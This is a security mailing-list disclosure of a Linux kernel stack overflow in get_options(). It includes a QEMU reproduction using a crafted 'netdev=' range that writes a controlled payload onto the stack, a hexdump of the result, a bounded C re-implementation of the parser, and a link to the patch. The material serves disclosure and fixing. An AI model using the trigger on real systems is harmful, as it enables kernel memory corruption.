Message-Id: <EBDB967B-92F8-47B9-AC79-CBF338A835F2@gmail.com>
Date: Tue, 30 May 2017 08:17:54 +0400
From: Ilya Matveychikov <matvejchikov@...il.com>
To: oss-security@...ts.openwall.com
Cc: Roee Hay <roeehay@...il.com>
Subject: Linux kernel: stack buffer overflow with controlled payload in get_options() function

Hello,

I’ve found a bug in the get_options() function, which is used for parsing
the kernel’s cmdline string. The bug is similar to CVE-2017-1000363 described
by Roee Hay (https://alephsecurity.com/vulns/aleph-2017023).

Details
=======

When using get_options() it's possible to specify a range of numbers,
like 1-100500. The problem is that it doesn't track the array size while
calling internally to get_range(), which iterates over the range and
fills the memory with numbers.

Given that, one can use the “netdev=min-max” option to cause a stack overflow
with a controlled payload. Here are some simple steps to reproduce the
problem in a QEMU-based virtual environment:

1) Run the kernel in QEMU and wait for the system halt:

  $ qemu-system-x86_64 -no-reboot -no-shutdown -kernel \
    /boot/vmlinuz-4.4.0-66-generic -append "netdev=3735928559-3735999999"

2) After the system halt, enter the QEMU console by pressing Ctrl-Alt-2 and dump
  all the guest machine's memory:

  compat_monitor0 console
  QEMU 2.5.0 monitor - type 'help' for more information
  (qemu) dump-guest-memory dump <ENTER>
  (qemu) quit <ENTER>

3) Look for the pair of magic numbers (deadbeef,deadbef0) in the "dump" file:

  $ hexdump -C dump | grep "ef be ad de f0 be ad de"
  01de42e0  ef be ad de f0 be ad de  f1 be ad de f2 be ad de  |................|

4) Follow address <01de42e0> in the hexdump:

  01de42e0  ef be ad de f0 be ad de  f1 be ad de f2 be ad de  |................|
  01de42f0  f3 be ad de f4 be ad de  f5 be ad de f6 be ad de  |................|
  01de4300  f7 be ad de f8 be ad de  f9 be ad de fa be ad de  |................|
  01de4310  fb be ad de fc be ad de  fd be ad de fe be ad de  |................|
  01de4320  ff be ad de 00 bf ad de  01 bf ad de 02 bf ad de  |................|
  01de4330  03 bf ad de 04 bf ad de  05 bf ad de 06 bf ad de  |................|
  01de4340  07 bf ad de 08 bf ad de  09 bf ad de 0a bf ad de  |................|
  01de4350  0b bf ad de 0c bf ad de  0d bf ad de 0e bf ad de  |................|
  01de4360  0f bf ad de 10 bf ad de  11 bf ad de 12 bf ad de  |................|
  01de4370  13 bf ad de 14 bf ad de  15 bf ad de 16 bf ad de  |................|
  01de4380  17 bf ad de 18 bf ad de  19 bf ad de 1a bf ad de  |................|
  01de4390  1b bf ad de 1c bf ad de  1d bf ad de 1e bf ad de  |................|
  01de43a0  1f bf ad de 20 bf ad de  21 bf ad de 22 bf ad de  |.... ...!..."...|
  01de43b0  23 bf ad de 24 bf ad de  25 bf ad de 26 bf ad de  |#...$...%...&...|
  01de43c0  27 bf ad de 28 bf ad de  29 bf ad de 2a bf ad de  |'...(...)...*...|
  01de43d0  2b bf ad de 2c bf ad de  2d bf ad de 2e bf ad de  |+...,...-.......|
  01de43e0  2f bf ad de 30 bf ad de  31 bf ad de 32 bf ad de  |/...0...1...2...|
  01de43f0  33 bf ad de 34 bf ad de  35 bf ad de 36 bf ad de  |3...4...5...6...|
  01de4400  37 bf ad de 38 bf ad de  39 bf ad de 3a bf ad de  |7...8...9...:...|
  01de4410  3b bf ad de 3c bf ad de  3d bf ad de 3e bf ad de  |;...<...=...>...|
  01de4420  3f bf ad de 40 bf ad de  41 bf ad de 42 bf ad de  |?...@...A...B...|
  01de4430  43 bf ad de 44 bf ad de  45 bf ad de 46 bf ad de  |C...D...E...F...|
  01de4440  47 bf ad de 48 bf ad de  49 bf ad de 4a bf ad de  |G...H...I...J...|
  01de4450  4b bf ad de 4c bf ad de  4d bf ad de 4e bf ad de  |K...L...M...N...|
  01de4460  4f bf ad de 50 bf ad de  51 bf ad de 52 bf ad de  |O...P...Q...R...|
  01de4470  53 bf ad de 54 bf ad de  55 bf ad de 56 bf ad de  |S...T...U...V...|
  01de4480  57 bf ad de 58 bf ad de  59 bf ad de 5a bf ad de  |W...X...Y...Z...|
  01de4490  5b bf ad de 5c bf ad de  5d bf ad de 5e bf ad de  |[...\...]...^...|
  01de44a0  5f bf ad de 60 bf ad de  61 bf ad de 62 bf ad de  |_...`...a...b...|
  01de44b0  63 bf ad de 64 bf ad de  65 bf ad de 66 bf ad de  |c...d...e...f...|
  01de44c0  67 bf ad de 68 bf ad de  69 bf ad de 6a bf ad de  |g...h...i...j...|
  01de44d0  6b bf ad de 6c bf ad de  6d bf ad de 6e bf ad de  |k...l...m...n...|
  01de44e0  6f bf ad de 70 bf ad de  71 bf ad de 72 bf ad de  |o...p...q...r...|
  01de44f0  73 bf ad de 74 bf ad de  75 bf ad de 76 bf ad de  |s...t...u...v...|
  01de4500  77 bf ad de 78 bf ad de  79 bf ad de 7a bf ad de  |w...x...y...z...|
  01de4510  7b bf ad de 7c bf ad de  7d bf ad de 7e bf ad de  |{...|...}...~...|
  01de4520  7f bf ad de 80 bf ad de  81 bf ad de 82 bf ad de  |................|
  01de4530  83 bf ad de 84 bf ad de  85 bf ad de 86 bf ad de  |................|
  01de4540  87 bf ad de 88 bf ad de  89 bf ad de 8a bf ad de  |................|
  01de4550  8b bf ad de 8c bf ad de  8d bf ad de 8e bf ad de  |................|
  ...
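
As an added illustration (not the reporter's code and not the kernel's
lib/cmdline.c), here is a bounded version of the same "a,b-c" parsing logic:
the range expander receives the remaining array capacity and stops when the
array is full, which is the property get_range() lacked. Function names are
hypothetical.

```c
/* Bounded re-implementation of get_options()-style "a,b-c" parsing.
 * Added example, not the kernel's lib/cmdline.c; names are hypothetical.
 * Layout mirrors get_options(): ints[0] = count, values in ints[1..]. */
#include <stdlib.h>

/* Expand lo..hi into pint[], storing at most n values; returns how many
 * were stored. The capacity n is what the vulnerable get_range() lacked. */
static int expand_range(long lo, long hi, int *pint, int n)
{
    int stored = 0;
    for (long x = lo; x <= hi && stored < n; x++)
        pint[stored++] = (int)x;
    return stored;
}

/* Parse str into ints[1..nints-1]; ints[0] gets the count.
 * Returns a pointer to the first character that was not consumed. */
char *bounded_get_options(const char *str, int nints, int *ints)
{
    int i = 1;
    char *end;
    if (nints < 1) return (char *)str;
    while (i < nints) {
        long v = strtol(str, &end, 0);
        if (end == str)                    /* no number at this position */
            break;
        if (*end == '-') {                 /* "min-max": expand, bounded */
            long hi = strtol(end + 1, &end, 0);
            i += expand_range(v, hi, &ints[i], nints - i);
        } else {
            ints[i++] = (int)v;
        }
        str = end;
        if (*str != ',')
            break;
        str++;
    }
    ints[0] = i - 1;
    return (char *)str;
}

/* Check helper: parse into 5 slots followed by a guard word; returns the
 * stored count, or -1 if the guard word was overwritten. */
int parse_guarded_count(const char *s)
{
    int buf[6];
    buf[5] = 0x5a5a;
    bounded_get_options(s, 5, buf);
    return buf[5] == 0x5a5a ? buf[0] : -1;
}
```

Feeding the report's own "3735928559-3735999999" range into a 5-slot array
stores only the 4 values that fit and leaves the guard word intact.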

The patch for the bug was submitted by me to the LKML recently:
https://lkml.org/lkml/2017/5/22/581

This was also reported to security@...nel.org.

Ilya Matveychikov
